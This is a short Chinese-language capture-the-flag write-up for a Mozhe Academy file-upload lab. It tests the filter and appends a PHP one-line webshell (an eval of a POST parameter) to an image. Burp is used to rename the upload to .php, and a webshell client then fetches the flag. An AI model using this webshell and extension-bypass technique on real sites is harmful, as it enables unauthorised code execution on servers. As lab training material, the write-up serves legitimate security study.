WebShell 文件上传漏洞分析溯源(第3题)-墨者学院

1.随手测试

打开一看,是上传题目,先随手上传一个 PHP 文件,发现被禁掉了,然后随便上传一个乱七八糟后缀名文件,发现也是上传不了的,那么此时应该推测为是白名单机制,只允许上传某些后缀。

2.测试改后缀

我们先将一个准备好的 PHP 一句话木马后缀改为 .jpg 然后在 Burp 中将后缀再改为 .php 经测试,发现这个方法还是不行,那么这时应该推测,检测机制是检测了文件头信息,所以想到了构造图片马,加上文件头信息,欺骗过检测。随便找张图片,使用 Notepad++ 软件打开,在文件最下面加上如下一句话:

<?php @eval($_POST['a']); ?>

WebShell 文件上传漏洞分析溯源(第3题)-墨者学院

3.上传

上传的时候开启 Burp 抓包,然后将抓到的包里面的文件后缀名由 .jpg 改为 .php
WebShell 文件上传漏洞分析溯源(第3题)-墨者学院
此时就可以上传成功了,然后连接菜刀,拿 Flag 吧。

发表评论

电子邮件地址不会被公开。必填项已用 * 标注